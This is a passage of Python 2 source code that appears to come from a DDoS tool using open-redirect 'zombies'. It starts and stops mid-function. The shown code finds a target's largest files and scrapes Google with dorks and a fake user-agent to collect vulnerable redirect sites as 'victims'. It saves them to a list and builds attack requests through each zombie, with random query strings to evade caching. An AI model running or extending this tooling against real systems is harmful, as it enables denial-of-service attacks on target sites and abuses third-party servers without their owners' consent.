  749.                 mpegs[mpeg] = int(size)
  750.                 print('(Size: ' + str(size) + ' Bytes)')
  751.                 print '-'*12
  752.             #print mpegs
  753.             biggest_mpeg = max(mpegs.keys(), key=lambda x: mpegs[x]) # search/extract biggest video (.mpeg) value from dict
  754.             biggest_files[biggest_mpeg] = mpegs[biggest_mpeg] # add biggest video (.mpeg) to list
  755.         except: # if not any .mpeg found, go for next
  756.             pass
  757.         try: # search for .mp3 files
  758.             regex_mp3 = []
  759.             regex_mp31 = "<src='(.+?.mp3)'" # search on target's results using regex with simple quotation
  760.             regex_mp3.append(regex_mp31)
  761.             regex_mp32 = '<src="(.+?.mp3)"' # search on target's results using regex with double quotation
  762.             regex_mp3.append(regex_mp32)
  763.             #regex_mp33 = '<src=(.+?.mp3)' # search on target's results using regex without quotations
  764.             #regex_mp3.append(regex_mp33)
  765.             for regmp3 in regex_mp3:
  766.                 pattern_mp3 = re.compile(regmp3)
  767.                 mp3_links = re.findall(pattern_mp3, target_reply)
  768.             mp3s = {}
  769.             for mp3 in mp3_links:
  770.                 print('+Audio (.mp3) found: ' + mp3)
  771.                 try:
  772.                     if mp3.startswith('http'):
  773.                         mp3_file = urllib.urlopen(mp3)
  774.                     else:
  775.                         target_host = urlparse(options.inspect)
  776.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  777.                         if not target_url.endswith('/'): # add "/" to end of target
  778.                             target_url = target_url + "/"
  779.                         mp3_file = urllib.urlopen(target_url + mp3)
  780.                     size = mp3_file.headers.get("content-length")
  781.                     if size is None: # grab data with len if content-lenght is not available on headers
  782.                         size = len(mp3_file.read())
  783.                 except:
  784.                     print('[Error] - Unable to retrieve info from Audio)')
  785.                     size = 0
  786.                 mp3s[mp3] = int(size)
  787.                 print('(Size: ' + str(size) + ' Bytes)')
  788.                 print '-'*12
  789.             #print mp3s
  790.             biggest_mp3 = max(mp3s.keys(), key=lambda x: mp3s[x]) # search/extract biggest audio (.mp3) value from dict
  791.             biggest_files[biggest_mp3] = mp3s[biggest_mp3] # add biggest audio (.mp3) to list
  792.         except: # if not any .mp3 found, go for next
  793.             pass
  794.         try: # search for .mp4 files
  795.             regex_mp4 = []
  796.             regex_mp41 = "<src='(.+?.mp4)'" # search on target's results using regex with simple quotation
  797.             regex_mp4.append(regex_mp41)
  798.             regex_mp42 = '<src="(.+?.mp4)"' # search on target's results using regex with double quotation
  799.             regex_mp4.append(regex_mp42)
  800.             #regex_mp43 = '<src=(.+?.mp4)' # search on target's results using regex without quotations
  801.             #regex_mp4.append(regex_mp43)
  802.             for regmp4 in regex_mp4:
  803.                 pattern_mp4 = re.compile(regmp4)
  804.                 mp4_links = re.findall(pattern_mp4, target_reply)
  805.             mp4s = {}
  806.             for mp4 in mp4_links:
  807.                 print('+Video (.mp4) found: ' + mp4)
  808.                 try:
  809.                     if mp4.startswith('http'):
  810.                         mp4_file = urllib.urlopen(mp4)
  811.                     else:
  812.                         target_host = urlparse(options.inspect)
  813.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  814.                         if not target_url.endswith('/'): # add "/" to end of target
  815.                             target_url = target_url + "/"
  816.                         mp4_file = urllib.urlopen(target_url + mp4)
  817.                     size = mp4_file.headers.get("content-length")
  818.                     if size is None: # grab data with len if content-lenght is not available on headers
  819.                         size = len(mp4_file.read())
  820.                 except:
  821.                     print('[Error] - Unable to retrieve info from Video)')
  822.                     size = 0
  823.                 mp4s[mp4] = int(size)
  824.                 print('(Size: ' + str(size) + ' Bytes)')
  825.                 print '-'*12
  826.             #print mp4s
  827.             biggest_mp4 = max(mp4s.keys(), key=lambda x: mp4s[x]) # search/extract biggest video (.mp4) value from dict
  828.             biggest_files[biggest_mp4] = mp4s[biggest_mp4] # add biggest video (.mp4) to list
  829.         except: # if not any .mp4 found, go for next
  830.             pass
  831.         try: # search for .ogg files
  832.             regex_ogg = []
  833.             regex_ogg1 = "<src='(.+?.ogg)'" # search on target's results using regex with simple quotation
  834.             regex_ogg.append(regex_ogg1)
  835.             regex_ogg2 = '<src="(.+?.ogg)"' # search on target's results using regex with double quotation
  836.             regex_ogg.append(regex_ogg2)
  837.             #regex_ogg3 = '<src=(.+?.ogg)' # search on target's results using regex without quotations
  838.             #regex_ogg.append(regex_ogg3)
  839.             for regogg in regex_ogg:
  840.                 pattern_ogg = re.compile(regogg)
  841.                 ogg_links = re.findall(pattern_ogg, target_reply)
  842.             oggs = {}
  843.             for ogg in ogg_links:
  844.                 print('+Video (.ogg) found: ' + ogg)
  845.                 try:
  846.                     if ogg.startswith('http'):
  847.                         ogg_file = urllib.urlopen(ogg)
  848.                     else:
  849.                         target_host = urlparse(options.inspect)
  850.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  851.                         if not target_url.endswith('/'): # add "/" to end of target
  852.                             target_url = target_url + "/"
  853.                         ogg_file = urllib.urlopen(target_url + ogg)
  854.                     size = ogg_file.headers.get("content-length")
  855.                     if size is None: # grab data with len if content-lenght is not available on headers
  856.                         size = len(ogg_file.read())
  857.                 except:
  858.                     print('[Error] - Unable to retrieve info from Video)')
  859.                     size = 0
  860.                 oggs[ogg] = int(size)
  861.                 print('(Size: ' + str(size) + ' Bytes)')
  862.                 print '-'*12
  863.             #print oggs
  864.             biggest_ogg = max(oggs.keys(), key=lambda x: oggs[x]) # search/extract biggest video (.ogg) value from dict
  865.             biggest_files[biggest_ogg] = oggs[biggest_ogg] # add biggest video (.ogg) to list
  866.         except: # if not any .ogg found, go for next
  867.             pass
  868.         try: # search for .ogv files
  869.             regex_ogv = []
  870.             regex_ogv1 = "<src='(.+?.ogv)'" # search on target's results using regex with simple quotation
  871.             regex_ogv.append(regex_ogv1)
  872.             regex_ogv2 = '<src="(.+?.ogv)"' # search on target's results using regex with double quotation
  873.             regex_ogv.append(regex_ogv2)
  874.             #regex_ogv3 = '<src=(.+?.ogv)' # search on target's results using regex without quotations
  875.             #regex_ogv.append(regex_ogv3)
  876.             for regogv in regex_ogv:
  877.                 pattern_ogv = re.compile(regogv)
  878.                 ogv_links = re.findall(pattern_ogv, target_reply)
  879.             ogvs = {}
  880.             for ogv in ogv_links:
  881.                 print('+Video (.ogv) found: ' + ogv)
  882.                 try:
  883.                     if ogv.startswith('http'):
  884.                         ogv_file = urllib.urlopen(ogv)
  885.                     else:
  886.                         target_host = urlparse(options.inspect)
  887.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  888.                         if not target_url.endswith('/'): # add "/" to end of target
  889.                             target_url = target_url + "/"
  890.                         ogv_file = urllib.urlopen(target_url + ogv)
  891.                     size = ogv_file.headers.get("content-length")
  892.                     if size is None: # grab data with len if content-lenght is not available on headers
  893.                         size = len(ogv_file.read())
  894.                 except:
  895.                     print('[Error] - Unable to retrieve info from Video)')
  896.                     size = 0
  897.                 ogvs[ogv] = int(size)
  898.                 print('(Size: ' + str(size) + ' Bytes)')
  899.                 print '-'*12
  900.             #print ogvs
  901.             biggest_ogv = max(ogvs.keys(), key=lambda x: ogvs[x]) # search/extract biggest video (.ogv) value from dict
  902.             biggest_files[biggest_ogv] = ogvs[biggest_ogv] # add biggest video (.ogv) to list
  903.         except: # if not any .ogv found, go for next
  904.             pass
  905.         try: # search for .wmv files
  906.             regex_wmv = []
  907.             regex_wmv1 = "<src='(.+?.wmv)'" # search on target's results using regex with simple quotation
  908.             regex_wmv.append(regex_wmv1)
  909.             regex_wmv2 = '<src="(.+?.wmv)"' # search on target's results using regex with double quotation
  910.             regex_wmv.append(regex_wmv2)
  911.             #regex_wmv3 = '<src=(.+?.wmv)' # search on target's results using regex without quotations
  912.             #regex_wmv.append(regex_wmv3)
  913.             for regwmv in regex_wmv:
  914.                 pattern_wmv = re.compile(regwmv)
  915.                 wmv_links = re.findall(pattern_wmv, target_reply)
  916.             wmvs = {}
  917.             for wmv in wmv_links:
  918.                 print('+Video (.wmv) found: ' + wmv)
  919.                 try:
  920.                     if wmv.startswith('http'):
  921.                         wmv_file = urllib.urlopen(wmv)
  922.                     else:
  923.                         target_host = urlparse(options.inspect)
  924.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  925.                         if not target_url.endswith('/'): # add "/" to end of target
  926.                             target_url = target_url + "/"
  927.                         wmv_file = urllib.urlopen(target_url + wmv)
  928.                     size = wmv_file.headers.get("content-length")
  929.                     if size is None: # grab data with len if content-lenght is not available on headers
  930.                         size = len(wmv_file.read())
  931.                 except:
  932.                     print('[Error] - Unable to retrieve info from Video)')
  933.                     size = 0
  934.                 wmvs[wmv] = int(size)
  935.                 print('(Size: ' + str(size) + ' Bytes)')
  936.                 print '-'*12
  937.             #print wmvs
  938.             biggest_wmv = max(wmvs.keys(), key=lambda x: wmvs[x]) # search/extract biggest video (.wmv) value from dict
  939.             biggest_files[biggest_wmv] = wmvs[biggest_wmv] # add biggest video (.wmv) to list
  940.         except: # if not any .wmv found, go for next
  941.             pass
  942.         try: # search for .css files
  943.             regex_css = []
  944.             regex_css1 = "href='(.+?.css[^']*)'" # search on target's results using regex with simple quotation
  945.             regex_css.append(regex_css1)
  946.             regex_css2 = 'href="(.+?.css[^"]*)"' # search on target's results using regex with double quotation
  947.             regex_css.append(regex_css2)
  948.             #regex_css3 = "href=(.+?.css[^']*)" # search on target's results using regex without quotations
  949.             #regex_css.append(regex_css3)
  950.             for regcss in regex_css:
  951.                 pattern_css = re.compile(regcss)
  952.                 css_links = re.findall(pattern_css, target_reply)
  953.             csss = {}
  954.             for css in css_links:
  955.                 print('+Style (.css) found: ' + css)
  956.                 try:
  957.                     if css.startswith('http'):
  958.                         css_file = urllib.urlopen(css)
  959.                     else:
  960.                         target_host = urlparse(options.inspect)
  961.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  962.                         if not target_url.endswith('/'): # add "/" to end of target
  963.                             target_url = target_url + "/"
  964.                         css_file = urllib.urlopen(target_url + css)
  965.                     size = css_file.headers.get("content-length")
  966.                     if size is None: # grab data with len if content-lenght is not available on headers
  967.                         size = len(css_file.read())
  968.                 except:
  969.                     print('[Error] - Unable to retrieve info from Style)')
  970.                     size = 0
  971.                 csss[css] = int(size)
  972.                 print('(Size: ' + str(size) + ' Bytes)')
  973.                 print '-'*12
  974.             #print csss
  975.             biggest_css = max(csss.keys(), key=lambda x: csss[x]) # search/extract biggest style (.css) value from dict
  976.             biggest_files[biggest_css] = csss[biggest_css] # add biggest style (.css) to list
  977.         except: # if not any .css found, go for next
  978.             pass
  979.         try: # search for .js files
  980.             regex_js = []
  981.             regex_js1 = "src='(.+?.js[^']*)'" # search on target's results using regex with simple quotation
  982.             regex_js.append(regex_js1)
  983.             regex_js2 = 'src="(.+?.js[^"]*)"' # search on target's results using regex with double quotation
  984.             regex_js.append(regex_js2)
  985.             #regex_js3 = "src=(.+?.js[^']*)" # search on target's results using regex without quotations
  986.             #regex_js.append(regex_js3)
  987.             for regjs in regex_js:
  988.                 pattern_js = re.compile(regjs)
  989.                 js_links = re.findall(pattern_js, target_reply)
  990.             jss = {}
  991.             for js in js_links:
  992.                 print('+Script (.js) found: ' + js)
  993.                 try:
  994.                     if js.startswith('http'):
  995.                         js_file = urllib.urlopen(js)
  996.                     else:
  997.                         target_host = urlparse(options.inspect)
  998.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  999.                         if not target_url.endswith('/'): # add "/" to end of target
  1000.                             target_url = target_url + "/"
  1001.                         js_file = urllib.urlopen(target_url + js)
  1002.                     size = js_file.headers.get("content-length")
  1003.                     if size is None: # grab data with len if content-lenght is not available on headers
  1004.                         size = len(js_file.read())
  1005.                 except:
  1006.                     print('[Error] - Unable to retrieve info from Script)')
  1007.                     size = 0
  1008.                 jss[js] = int(size)
  1009.                 print('(Size: ' + str(size) + ' Bytes)')
  1010.                 print '-'*12
  1011.             #print jss
  1012.             biggest_js = max(jss.keys(), key=lambda x: jss[x]) # search/extract biggest script (.js) value from dict
  1013.             biggest_files[biggest_js] = jss[biggest_js] # add biggest script (.js) to list
  1014.         except: # if not any .js found, go for next
  1015.             pass
  1016.         try: # search for .xml files
  1017.             regex_xml = []
  1018.             regex_xml1 = "href='(.+?.xml)'" # search on target's results using regex with simple quotation
  1019.             regex_xml.append(regex_xml1)
  1020.             regex_xml2 = 'href="(.+?.xml)"' # search on target's results using regex with double quotation
  1021.             regex_xml.append(regex_xml2)
  1022.             #regex_xml3 = 'href=(.+?.xml)' # search on target's results using regex without quotations
  1023.             #regex_xml.append(regex_xml3)
  1024.             for regxml in regex_xml:
  1025.                 pattern_xml = re.compile(regxml)
  1026.                 xml_links = re.findall(pattern_xml, target_reply)
  1027.             xmls = {}
  1028.             for xml in xml_links:
  1029.                 print('+Script (.xml) found: ' + xml)
  1030.                 try:
  1031.                     if xml.startswith('http'):
  1032.                         xml_file = urllib.urlopen(xml)
  1033.                     else:
  1034.                         target_host = urlparse(options.inspect)
  1035.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1036.                         if not target_url.endswith('/'): # add "/" to end of target
  1037.                             target_url = target_url + "/"
  1038.                         xml_file = urllib.urlopen(target_url + xml)
  1039.                     size = xml_file.headers.get("content-length")
  1040.                     if size is None: # grab data with len if content-lenght is not available on headers
  1041.                         size = len(xml_file.read())
  1042.                 except:
  1043.                     print('[Error] - Unable to retrieve info from Script)')
  1044.                     size = 0
  1045.                 xmls[xml] = int(size)
  1046.                 print('(Size: ' + str(size) + ' Bytes)')
  1047.                 print '-'*12
  1048.             #print xmls
  1049.             biggest_xml = max(xmls.keys(), key=lambda x: xmls[x]) # search/extract biggest script (.xml) value from dict
  1050.             biggest_files[biggest_xml] = xmls[biggest_xml]  # add biggest script (.xml) to list
  1051.         except: # if not any .xml found, go for next
  1052.             pass
  1053.         try: # search for .php files
  1054.             regex_php = []
  1055.             regex_php1 = "href='(.+?.php)'" # search on target's results using regex with simple quotation
  1056.             regex_php.append(regex_php1)
  1057.             regex_php2 = 'href="(.+?.php)"' # search on target's results using regex with double quotation
  1058.             regex_php.append(regex_php2)
  1059.             #regex_php3 = 'href=(.+?.php)' # search on target's results using regex without quotations
  1060.             #regex_php.append(regex_php3)
  1061.             for regphp in regex_php:
  1062.                 pattern_php = re.compile(regphp)
  1063.                 php_links = re.findall(pattern_php, target_reply)
  1064.             phps = {}
  1065.             for php in php_links:
  1066.                 print('+Webpage (.php) found: ' + php)
  1067.                 try:
  1068.                     if php.startswith('http'):
  1069.                         php_file = urllib.urlopen(php)
  1070.                     else:
  1071.                         target_host = urlparse(options.inspect)
  1072.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1073.                         if not target_url.endswith('/'): # add "/" to end of target
  1074.                             target_url = target_url + "/"
  1075.                         php_file = urllib.urlopen(target_url + php)
  1076.                     size = php_file.headers.get("content-length")
  1077.                     if size is None: # grab data with len if content-lenght is not available on headers
  1078.                         size = len(php_file.read())
  1079.                 except:
  1080.                     print('[Error] - Unable to retrieve info from Webpage)')
  1081.                     size = 0
  1082.                 phps[php] = int(size)
  1083.                 print('(Size: ' + str(size) + ' Bytes)')
  1084.                 print '-'*12
  1085.             #print phps
  1086.             biggest_php = max(phps.keys(), key=lambda x: phps[x]) # search/extract biggest file (.php) value from dict
  1087.             biggest_files[biggest_php] = phps[biggest_php] # add biggest file (.php) to list
  1088.         except: # if not any .php found, go for next
  1089.             pass
  1090.         try: # search for .html files
  1091.             regex_html = []
  1092.             regex_html1 = "href='(.+?.html)'" # search on target's results using regex with simple quotation
  1093.             regex_html.append(regex_html1)
  1094.             regex_html2 = 'href="(.+?.html)"' # search on target's results using regex with double quotation
  1095.             regex_html.append(regex_html2)
  1096.             #regex_html3 = 'href=(.+?.html)' # search on target's results using regex without quotations
  1097.             #regex_html.append(regex_html3)
  1098.             for reghtml in regex_html:
  1099.                 pattern_html = re.compile(reghtml)
  1100.                 html_links = re.findall(pattern_html, target_reply)
  1101.             htmls = {}
  1102.             for html in html_links:
  1103.                 print('+Webpage (.html) found: ' + html)
  1104.                 try:
  1105.                     if html.startswith('http'):
  1106.                         html_file = urllib.urlopen(html)
  1107.                     else:
  1108.                         target_host = urlparse(options.inspect)
  1109.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1110.                         if not target_url.endswith('/'): # add "/" to end of target
  1111.                             target_url = target_url + "/"
  1112.                         html_file = urllib.urlopen(target_url + html)
  1113.                     size = html_file.headers.get("content-length")
  1114.                     if size is None: # grab data with len if content-lenght is not available on headers
  1115.                         size = len(html_file.read())
  1116.                 except:
  1117.                     print('[Error] - Unable to retrieve info from Webpage)')
  1118.                     size = 0
  1119.                 htmls[html] = int(size)
  1120.                 print('(Size: ' + str(size) + ' Bytes)')
  1121.                 print '-'*12
  1122.             #print htmls
  1123.             biggest_html = max(htmls.keys(), key=lambda x: htmls[x]) # search/extract biggest file (.html) value from dict
  1124.             biggest_files[biggest_html] = htmls[biggest_html] # add biggest file (.html) to list
  1125.         except: # if not any .html found, go for next
  1126.             pass
  1127.         try: # search for .jsp files
  1128.             regex_jsp = []
  1129.             regex_jsp1 = "href='(.+?.jsp)'" # search on target's results using regex with simple quotation
  1130.             regex_jsp.append(regex_jsp1)
  1131.             regex_jsp2 = 'href="(.+?.jsp)"' # search on target's results using regex with double quotation
  1132.             regex_jsp.append(regex_jsp2)
  1133.             #regex_jsp3 = 'href=(.+?.jsp)' # search on target's results using regex without quotations
  1134.             #regex_jsp.append(regex_jsp3)
  1135.             for regjsp in regex_jsp:
  1136.                 pattern_jsp = re.compile(regjsp)
  1137.                 jsp_links = re.findall(pattern_jsp, target_reply)
  1138.             jsps = {}
  1139.             for jsp in jsp_links:
  1140.                 print('+Webpage (.jsp) found: ' + jsp)
  1141.                 try:
  1142.                     if jsp.startswith('http'):
  1143.                         jsp_file = urllib.urlopen(jsp)
  1144.                     else:
  1145.                         target_host = urlparse(options.inspect)
  1146.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1147.                         if not target_url.endswith('/'): # add "/" to end of target
  1148.                             target_url = target_url + "/"
  1149.                         jsp_file = urllib.urlopen(target_url + jsp)
  1150.                     size = jsp_file.headers.get("content-length")
  1151.                     if size is None: # grab data with len if content-lenght is not available on headers
  1152.                         size = len(jsp_file.read())
  1153.                 except:
  1154.                     print('[Error] - Unable to retrieve info from Webpage)')
  1155.                     size = 0
  1156.                 jsps[jsp] = int(size)
  1157.                 print('(Size: ' + str(size) + ' Bytes)')
  1158.                 print '-'*12
  1159.             #print jsps
  1160.             biggest_jsp = max(jsps.keys(), key=lambda x: jsps[x]) # search/extract biggest file (.jsp) value from dict
  1161.             biggest_files[biggest_jsp] = jsps[biggest_jsp] # add biggest file (.jsp) to list
  1162.         except: # if not any .jsp found, go for next
  1163.             pass
  1164.         try: # search for .asp files
  1165.             regex_asp = []
  1166.             regex_asp1 = "href='(.+?.asp)'" # search on target's results using regex with simple quotation
  1167.             regex_asp.append(regex_asp1)
  1168.             regex_asp2 = 'href="(.+?.asp)"' # search on target's results using regex with double quotation
  1169.             regex_asp.append(regex_asp2)
  1170.             #regex_asp3 = 'href=(.+?.asp)' # search on target's results using regex without quotations
  1171.             #regex_asp.append(regex_asp3)
  1172.             for regasp in regex_asp:
  1173.                 pattern_asp = re.compile(regasp)
  1174.                 asp_links = re.findall(pattern_asp, target_reply)
  1175.             asps = {}
  1176.             for asp in asp_links:
  1177.                 print('+Webpage (.asp) found: ' + asp)
  1178.                 try:
  1179.                     if asp.startswith('http'):
  1180.                         asp_file = urllib.urlopen(asp)
  1181.                     else:
  1182.                         target_host = urlparse(options.inspect)
  1183.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1184.                         if not target_url.endswith('/'): # add "/" to end of target
  1185.                             target_url = target_url + "/"
  1186.                         asp_file = urllib.urlopen(target_url + asp)
  1187.                     size = asp_file.headers.get("content-length")
  1188.                     if size is None: # grab data with len if content-lenght is not available on headers
  1189.                         size = len(asp_file.read())
  1190.                 except:
  1191.                     print('[Error] - Unable to retrieve info from Webpage)')
  1192.                     size = 0
  1193.                 asps[asp] = int(size)
  1194.                 print('(Size: ' + str(size) + ' Bytes)')
  1195.                 print '-'*12
  1196.             #print asps
  1197.             biggest_asp = max(asps.keys(), key=lambda x: asps[x]) # search/extract biggest file (.asp) value from dict
  1198.             biggest_files[biggest_asp] = asps[biggest_asp] # add biggest file (.asp) to list
  1199.         except: # if not any .asp found, go for next
  1200.             pass
  1201.         try: # search for .txt files
  1202.             regex_txt = []
  1203.             regex_txt1 = "href='(.+?.txt)'" # search on target's results using regex with simple quotation
  1204.             regex_txt.append(regex_txt1)
  1205.             regex_txt2 = 'href="(.+?.txt)"' # search on target's results using regex with double quotation
  1206.             regex_txt.append(regex_txt2)
  1207.             #regex_txt3 = 'href=(.+?.txt)' # search on target's results using regex without quotations
  1208.             #regex_txt.append(regex_txt3)
  1209.             for regtxt in regex_txt:
  1210.                 pattern_txt = re.compile(regtxt)
  1211.                 txt_links = re.findall(pattern_txt, target_reply)
  1212.             txts = {}
  1213.             for txt in txt_links:
  1214.                 print('+File (.txt) found: ' + txt)
  1215.                 try:
  1216.                     if txt.startswith('http'):
  1217.                         txt_file = urllib.urlopen(txt)
  1218.                     else:
  1219.                         target_host = urlparse(options.inspect)
  1220.                         target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1221.                         if not target_url.endswith('/'): # add "/" to end of target
  1222.                             target_url = target_url + "/"
  1223.                         txt_file = urllib.urlopen(target_url + txt)
  1224.                     size = txt_file.headers.get("content-length")
  1225.                     if size is None: # grab data with len if content-lenght is not available on headers
  1226.                         size = len(txt_file.read())
  1227.                 except:
  1228.                     print('[Error] - Unable to retrieve info from Webpage)')
  1229.                     size = 0
  1230.                 txts[txt] = int(size)
  1231.                 print('(Size: ' + str(size) + ' Bytes)')
  1232.                 print '-'*12
  1233.             #print txts
  1234.             biggest_txt = max(txts.keys(), key=lambda x: txts[x]) # search/extract biggest file (.txt) value from dict
  1235.             biggest_files[biggest_txt] = txts[biggest_txt] # add biggest file (.txt) to list
  1236.         except: # if not any .txt found, go for next
  1237.             pass
  1238.         print '='*80
  1239.         #print biggest_files
  1240.         biggest_file_on_target = max(biggest_files.keys(), key=lambda x: biggest_files[x]) # search/extract biggest file value from dict
  1241.         if biggest_file_on_target.startswith('http'):
  1242.             print ('=Biggest File: ' + biggest_file_on_target)
  1243.         else:
  1244.             target_host = urlparse(options.inspect)
  1245.             target_url = target_host.scheme + "://" + target_host.netloc + target_host.path
  1246.             if not target_url.endswith('/'): # add "/" to end of target
  1247.                 target_url = target_url + "/"
  1248.             print ('=Biggest File: ' + target_url + biggest_file_on_target)
  1249.         print '='*80 + '\n'
  1250.  
  1251.     def extract_dorks(self):
  1252.         # extract dorks from file (ex: 'dorks.txt')
  1253.         try:
  1254.             f = open('dorks.txt')
  1255.             dorks = f.readlines()
  1256.             dorks = [ dork.replace('\n','') for dork in dorks ]
  1257.             f.close()
  1258.             if not dorks:
  1259.                 print "\n[Error] - Imposible to retrieve 'dorks' from file."
  1260.                 return #sys.exit(2)
  1261.             else:
  1262.                 return dorks
  1263.         except:
  1264.             if os.path.exists('dorks.txt') == True:
  1265.                 print '\n[Error] - Cannot open:', 'dorks.txt', "\n"
  1266.                 return #sys.exit(2)
  1267.             else:
  1268.                 print '\n[Error] - Cannot found:', 'dorks.txt', "\n"
  1269.                 return #sys.exit(2)
  1270.  
  1271.     def search_zombies(self, dork):
  1272.         # crawl google's results to search for possible zombies
  1273.         options = self.options
  1274.         url = 'https://www.google.com/xhtml?'
  1275.         if options.search: # search from query
  1276.             q = 'inurl:"' + str(options.search) + '"' # set query to search literally in google's results
  1277.         if options.dorks: # search from a dork
  1278.             q = 'inurl:"' + str(dork) + '"' # set query, from a dork, to search literally in google's results
  1279.         start = 0 # set index number of first entry
  1280.         if options.num_results: # set number of results to search
  1281.             try:
  1282.                 num = int(options.num_results)
  1283.             except:
  1284.                 print("You should specify and integer!!!. Using default value: 10\n")
  1285.                 num = 10
  1286.         else:
  1287.             num = 10
  1288.         gws_rd = 'ssl' # set SSL as default
  1289.         query_string = { 'q':q, 'start':start, 'num':num, 'gws_rd':gws_rd }
  1290.         data = urllib.urlencode(query_string)
  1291.         url = url + data
  1292.         headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  1293.         if options.verbose:
  1294.             print("Query used: " + url + "\n")
  1295.         try:
  1296.             req = urllib2.Request(url, None, headers)
  1297.             google_reply = urllib2.urlopen(req).read()
  1298.         except:
  1299.             print('[Error] - Unable to connect to google\n')
  1300.             if not options.dorks:
  1301.                 return #sys.exit(2)
  1302.             else:
  1303.                 google_reply = ''
  1304.         #print google_reply
  1305.         regex = '<h3 class="r"><a href="/url(.+?)">' # search urls on google's results using regex
  1306.         pattern = re.compile(regex)
  1307.         url_links = re.findall(pattern, google_reply)
  1308.         zombies = []
  1309.         for url in url_links:
  1310.             url_link = url.strip('?q=') # parse url_links to retrieve only a url
  1311.             url_link = urllib.unquote(url_link).decode('utf8') # unquote encoding
  1312.             if options.search:
  1313.                 sep = str(options.search)
  1314.             if options.dorks:
  1315.                 sep = str(dork)
  1316.             url_link = url_link.rsplit(sep, 1)[0] + sep
  1317.             if url_link not in zombies: # parse possible repetitions
  1318.                 print('+Victim found: ' + url_link)
  1319.                 print '-'*12
  1320.                 zombies.append(url_link)
  1321.             else:
  1322.                 pass
  1323.         if len(zombies) == 0:
  1324.             print "[INFO] - Not any possible victim(s) found!"
  1325.             if not options.dorks:
  1326.                 print "\n"
  1327.                 return #sys.exit(2)
  1328.         print '\n' + '='*22
  1329.         print('+Possible Zombies: ' + str(len(zombies)))
  1330.         self.total_possible_zombies = self.total_possible_zombies + len(zombies)
  1331.         print '='*22 + '\n'
  1332.         if options.dorks:
  1333.             print '-'*44 + '\n'
  1334.         return zombies
  1335.  
  1336.     def extract_zombies(self):
  1337.         # extract targets from file (ex: 'zombies.txt')
  1338.         options = self.options
  1339.         if self.options.test:
  1340.             try:
  1341.                 f = open(options.test)
  1342.                 zombies = f.readlines()
  1343.                 zombies = [ zombie.replace('\n','') for zombie in zombies ]
  1344.                 f.close()
  1345.                 if not zombies:
  1346.                     print "\n[Error] - Imposible to retrieve 'zombies' from file."
  1347.                     return #sys.exit(2)
  1348.                 else:
  1349.                     return zombies
  1350.             except:
  1351.                 if os.path.exists(options.test) == True:
  1352.                     print '\n[Error] - Cannot open:', options.test, "\n"
  1353.                     return #sys.exit(2)
  1354.                 else:
  1355.                     print '\n[Error] - Cannot found:', options.test, "\n"
  1356.                     return #sys.exit(2)
  1357.         else:
  1358.             try:
  1359.                 f = open('zombies.txt')
  1360.                 zombies = f.readlines()
  1361.                 zombies = [ zombie.replace('\n','') for zombie in zombies ]
  1362.                 f.close()
  1363.                 if not zombies:
  1364.                     print "\n[Error] - Imposible to retrieve 'zombies' from file."
  1365.                     return #sys.exit(2)
  1366.                 else:
  1367.                     return zombies
  1368.             except:
  1369.                 if os.path.exists('zombies.txt') == True:
  1370.                     print '\n[Error] - Cannot open:', 'zombies.txt', "\n"
  1371.                     return #sys.exit(2)
  1372.                 else:
  1373.                     print '\n[Error] - Cannot found:', 'zombies.txt', "\n"
  1374.                     return #sys.exit(2)
  1375.  
  1376.     def update_zombies(self, zombies_ready):
  1377.         # update targets on file (ex: 'zombies.txt')
  1378.         options = self.options
  1379.         if options.test:
  1380.             f = open(options.test, "w") # re-write list only with valid zombies
  1381.             for zombie in zombies_ready:
  1382.                 f.write(zombie + os.linesep)
  1383.             f.close()
  1384.         if options.search or options.dorks or options.download:
  1385.             f = open('zombies.txt')
  1386.             zombies_on_file = f.read().splitlines()
  1387.             f.close()
  1388.             with open("zombies.txt", "a") as zombie_list: # append them to existing list
  1389.                 for zombie in zombies_ready:
  1390.                     if zombie not in zombies_on_file: # parse possible repetitions
  1391.                         zombie_list.write(zombie + os.linesep)
  1392.  
  1393.     def connect_zombies(self, zombie):
  1394.         # connect zombies and manage different options: HEAD, GET, POST,
  1395.         # user-Agent, referer, timeout, retries, threads, delay..
  1396.         options = self.options
  1397.         c = pycurl.Curl()
  1398.         if self.head == True:
  1399.             c.setopt(pycurl.URL, zombie) # set 'zombie' target
  1400.             c.setopt(pycurl.NOBODY, 1) # use HEAD
  1401.         if self.payload == True:
  1402.             payload = zombie + "http://www.google.es" #Open Redirect payload
  1403.             c.setopt(pycurl.URL, payload) # set 'zombie' payload
  1404.             c.setopt(pycurl.NOBODY, 0) # use GET
  1405.         if self.external == True:
  1406.             external_service = "http://www.downforeveryoneorjustme.com/"
  1407.             if options.target.startswith('https://'): # fixing downforeveryoneorjustme url prefix problems
  1408.                 options.target = options.target.replace('https://','http://')
  1409.             external = external_service + options.target
  1410.             c.setopt(pycurl.URL, external) # external HEAD check before to attack
  1411.             c.setopt(pycurl.NOBODY, 0) # use GET
  1412.         if self.attack_mode == True:
  1413.             if options.place:
  1414.             # use zombie's vector to connect to a target's place and add a random query to evade cache
  1415.                 random_name_hash = random.randint(1, 100000000)
  1416.                 random_hash = random.randint(1, 100000000)
  1417.                 if options.place.endswith("/"):
  1418.                     options.place = re.sub('/$', '', options.place)
  1419.                 if options.place.startswith("/"):
  1420.                     #print options.place
  1421.                     if "?" in options.place:
  1422.                         url_attack = zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  1423.                     else:
  1424.                         url_attack = zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  1425.                 else:
  1426.                     if "?" in options.place:
  1427.                         url_attack = zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  1428.                     else:
  1429.                         url_attack = zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
